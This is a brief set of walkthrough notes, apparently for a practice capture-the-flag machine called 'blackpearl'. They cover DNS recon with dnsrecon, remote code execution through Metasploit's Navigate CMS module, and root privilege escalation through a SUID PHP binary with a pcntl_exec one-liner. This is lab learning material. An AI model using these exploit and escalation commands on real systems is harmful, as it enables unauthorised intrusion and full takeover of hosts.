53 is DNS. The only other thing after nginx because it’s likely not OpenSSH
to recon DNS:
dnsrecon -r 127.0.0.0/24 -n 192.168.218.134 -d dick
-r is range
-n is target IP
-d is domain (put anything, doesn’t work without it)
We can add the DNS to our /etc/hosts
and then visit http://blackpearl.tcm
How to add that to Metasploit?:
use exploit/multi/http/navigate_cms_rce
set rhost 192.168.218.134
set vhost blackpearl.tcm
after meterpreter use:
shell
to jump in a shell.
We need to make TTY Shell which means we need Python. To check for Python do:
which python
finding files with SUID:
find / -type f -perm -4000 2>/dev/null
compare the services/files/folders to stuff on gtfobins
use SUID with PHP (in this case):
cd /usr/bin
php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"
whoami
cd /root
ls
cat flag.txt